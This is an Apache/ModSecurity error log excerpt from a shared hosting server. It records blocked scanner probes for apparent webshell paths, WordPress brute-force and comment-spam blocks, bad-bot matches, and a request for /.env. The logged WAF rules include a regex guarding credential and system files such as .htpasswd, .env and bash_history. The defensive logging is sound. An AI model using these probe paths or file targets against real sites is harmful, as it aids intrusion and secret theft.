[Tue May 26 12:48:02.890421 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJKuXLPuWQsfM-UVSoagAAAB4"]
[Tue May 26 12:48:03.926781 2026] [security2:error] [pid 448967:tid 449141] [client 4.201.75.230:5324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/flower.php"] [unique_id "ahVJK-XLPuWQsfM-UVSojwAAACw"]
[Tue May 26 12:48:04.437932 2026] [security2:error] [pid 448967:tid 448973] [remote 84.247.129.9:52826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVJLOXLPuWQsfM-UVSomQAANwU"]
[Tue May 26 12:48:05.148736 2026] [security2:error] [pid 448967:tid 449158] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJLOXLPuWQsfM-UVSopQAAAD0"]
[Tue May 26 12:48:07.377269 2026] [security2:error] [pid 448967:tid 449186] [client 172.236.119.165:5272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahVJLuXLPuWQsfM-UVSozgAAAFk"]
[Tue May 26 12:48:09.191681 2026] [security2:error] [pid 448967:tid 449114] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJMOXLPuWQsfM-UVSpAAAAABE"]
[Tue May 26 12:48:09.484820 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:63684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpDwAAACE"]
[Tue May 26 12:48:09.484950 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:63684] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpDwAAACE"]
[Tue May 26 12:48:09.984413 2026] [security2:error] [pid 448967:tid 449215] [client 4.201.75.230:5228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/blurbs.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpHQAAAHY"]
[Tue May 26 12:48:11.474072 2026] [security2:error] [pid 448967:tid 449220] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJM-XLPuWQsfM-UVSpPQAAAHs"]
[Tue May 26 12:48:12.987853 2026] [security2:error] [pid 448967:tid 449204] [client 4.201.75.230:5237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/akcc.php"] [unique_id "ahVJNOXLPuWQsfM-UVSpagAAAGs"]
[Tue May 26 12:48:15.575448 2026] [security2:error] [pid 448967:tid 449221] [client 193.37.33.107:62949] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVJN-XLPuWQsfM-UVSpnwAAAHw"]
[Tue May 26 12:48:16.358328 2026] [security2:error] [pid 448967:tid 449110] [client 85.208.96.196:42698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/header-video/"] [unique_id "ahVJOOXLPuWQsfM-UVSpvQAAAA0"]
[Tue May 26 12:48:16.358471 2026] [security2:error] [pid 448967:tid 449110] [client 85.208.96.196:42698] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/header-video/"] [unique_id "ahVJOOXLPuWQsfM-UVSpvQAAAA0"]
[Tue May 26 12:48:16.849116 2026] [security2:error] [pid 448967:tid 449194] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJOOXLPuWQsfM-UVSpwAAAAGE"]
[Tue May 26 12:48:17.551873 2026] [security2:error] [pid 448967:tid 449004] [remote 52.18.195.140:34712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp2gAACCQ"]
[Tue May 26 12:48:17.737658 2026] [security2:error] [pid 448967:tid 449003] [remote 31.24.44.107:33156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp4gAAZCM"]
[Tue May 26 12:48:17.870570 2026] [security2:error] [pid 448967:tid 449177] [client 202.76.142.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp3gAAAFA"]
[Tue May 26 12:48:18.551961 2026] [security2:error] [pid 448967:tid 449014] [remote 116.202.226.180:55930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.226.202.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJOuXLPuWQsfM-UVSp9gAAFy4"]
[Tue May 26 12:48:19.628719 2026] [security2:error] [pid 448967:tid 449137] [client 4.201.75.230:5358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/shelp.php"] [unique_id "ahVJO-XLPuWQsfM-UVSqJwAAACg"]
[Tue May 26 12:48:20.005008 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJO-XLPuWQsfM-UVSqJgAAAFc"]
[Tue May 26 12:48:20.062172 2026] [security2:error] [pid 448967:tid 449105] [client 157.20.138.61:64051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJPOXLPuWQsfM-UVSqOAAAAAg"]
[Tue May 26 12:48:20.062298 2026] [security2:error] [pid 448967:tid 449105] [client 157.20.138.61:64051] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJPOXLPuWQsfM-UVSqOAAAAAg"]
[Tue May 26 12:48:20.501272 2026] [security2:error] [pid 448967:tid 449194] [client 74.7.175.183:39196] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "powersociety.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVJPOXLPuWQsfM-UVSqQAAAYS0"]
[Tue May 26 12:48:21.956393 2026] [security2:error] [pid 448967:tid 449201] [client 195.2.78.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVJPeXLPuWQsfM-UVSqZgAAAGg"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:22.321375 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJPeXLPuWQsfM-UVSqaQAAAHk"]
[Tue May 26 12:48:23.975327 2026] [security2:error] [pid 448967:tid 449191] [client 4.201.75.230:5901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/cord.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlQAAAF4"]
[Tue May 26 12:48:23.982479 2026] [security2:error] [pid 448967:tid 449210] [client 195.2.78.191:60928] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.2.78.191" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlgAAAHE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:23.982585 2026] [security2:error] [pid 448967:tid 449210] [client 195.2.78.191:60928] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlgAAAHE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:25.114046 2026] [security2:error] [pid 448967:tid 449185] [client 176.111.37.216:53222] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 216.37.111.176.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqrgAAAFg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:25.114155 2026] [security2:error] [pid 448967:tid 449185] [client 176.111.37.216:53222] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqrgAAAFg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:25.642295 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqsQAAABo"]
[Tue May 26 12:48:27.935069 2026] [security2:error] [pid 448967:tid 449198] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJQ-XLPuWQsfM-UVSrBgAAAGU"]
[Tue May 26 12:48:28.250041 2026] [security2:error] [pid 448967:tid 449057] [remote 18.190.7.192:54498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVJROXLPuWQsfM-UVSrGgAAVFk"]
[Tue May 26 12:48:30.031201 2026] [security2:error] [pid 448967:tid 448969] [remote 52.18.195.140:33128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVJReXLPuWQsfM-UVSrXgAARAE"]
[Tue May 26 12:48:30.347929 2026] [security2:error] [pid 448967:tid 449159] [client 4.201.75.230:5945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/dex.php"] [unique_id "ahVJRuXLPuWQsfM-UVSrawAAAD4"]
[Tue May 26 12:48:30.767020 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:64414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJRuXLPuWQsfM-UVSreAAAAHE"]
[Tue May 26 12:48:30.767181 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:64414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJRuXLPuWQsfM-UVSreAAAAHE"]
[Tue May 26 12:48:30.861051 2026] [security2:error] [pid 448967:tid 449116] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJRuXLPuWQsfM-UVSrbgAAABM"]
[Tue May 26 12:48:31.095026 2026] [security2:error] [pid 448967:tid 449128] [client 74.7.175.131:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "workrepublic.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVJR-XLPuWQsfM-UVSrhwAAAB8"]
[Tue May 26 12:48:31.095602 2026] [security2:error] [pid 448967:tid 449160] [client 74.7.175.131:45582] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "workrepublic.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVJR-XLPuWQsfM-UVSrhQAAPwo"]
[Tue May 26 12:48:32.114917 2026] [security2:error] [pid 448967:tid 449104] [client 4.201.75.230:5910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJSOXLPuWQsfM-UVSrngAAAAc"]
[Tue May 26 12:48:33.582909 2026] [autoindex:error] [pid 448967:tid 449183] [client 74.7.243.222:0] AH01276: Cannot serve directory /home2/debatqhn/workrepublic.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:48:34.317093 2026] [security2:error] [pid 448967:tid 449113] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJSeXLPuWQsfM-UVSr0gAAABA"]
[Tue May 26 12:48:34.947727 2026] [security2:error] [pid 448967:tid 449108] [client 4.201.75.230:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/zwso.php"] [unique_id "ahVJSuXLPuWQsfM-UVSr7AAAAAs"]
[Tue May 26 12:48:35.556971 2026] [security2:error] [pid 448967:tid 449191] [client 176.65.139.232:39866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.composer.dezka.mx"] [uri "/.env"] [unique_id "ahVJS-XLPuWQsfM-UVSr-gAAAF4"]
[Tue May 26 12:48:37.169706 2026] [security2:error] [pid 448967:tid 449113] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJTOXLPuWQsfM-UVSsFQAAABA"]
[Tue May 26 12:48:38.198162 2026] [security2:error] [pid 448967:tid 449125] [client 4.201.75.230:5332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/zwso.php"] [unique_id "ahVJTuXLPuWQsfM-UVSsPAAAABw"]
[Tue May 26 12:48:39.410446 2026] [security2:error] [pid 448967:tid 449145] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJTuXLPuWQsfM-UVSsUgAAADA"]
[Tue May 26 12:48:41.364292 2026] [security2:error] [pid 448967:tid 449167] [client 4.201.75.230:5316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/shlo.php"] [unique_id "ahVJUeXLPuWQsfM-UVSslQAAAEY"]
[Tue May 26 12:48:41.696693 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:64772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJUeXLPuWQsfM-UVSsmQAAACE"]
[Tue May 26 12:48:41.696852 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:64772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJUeXLPuWQsfM-UVSsmQAAACE"]
[Tue May 26 12:48:42.446916 2026] [security2:error] [pid 448967:tid 449154] [client 4.201.75.230:5670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/133.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsrwAAADk"]
[Tue May 26 12:48:42.812058 2026] [security2:error] [pid 448967:tid 449178] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsqwAAAFE"]
[Tue May 26 12:48:43.241099 2026] [security2:error] [pid 448967:tid 449092] [remote 172.236.172.195:54668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVJU-XLPuWQsfM-UVSswgAAVXw"]
[Tue May 26 12:48:43.308666 2026] [security2:error] [pid 448967:tid 449106] [client 202.76.174.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsvAAAAAk"]
[Tue May 26 12:48:44.730380 2026] [security2:error] [pid 448967:tid 449213] [client 4.201.75.230:5693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/lufix1.php"] [unique_id "ahVJVOXLPuWQsfM-UVSs7gAAAHQ"]
[Tue May 26 12:48:44.972301 2026] [security2:error] [pid 448967:tid 449157] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJVOXLPuWQsfM-UVSs5gAAADw"]
[Tue May 26 12:48:45.798528 2026] [security2:error] [pid 448967:tid 448997] [remote 74.7.241.58:44442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJVeXLPuWQsfM-UVStDQAAZx0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:48:46.357130 2026] [security2:error] [pid 448967:tid 449203] [client 4.201.75.230:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/witmm.php"] [unique_id "ahVJVuXLPuWQsfM-UVStGgAAAGo"]
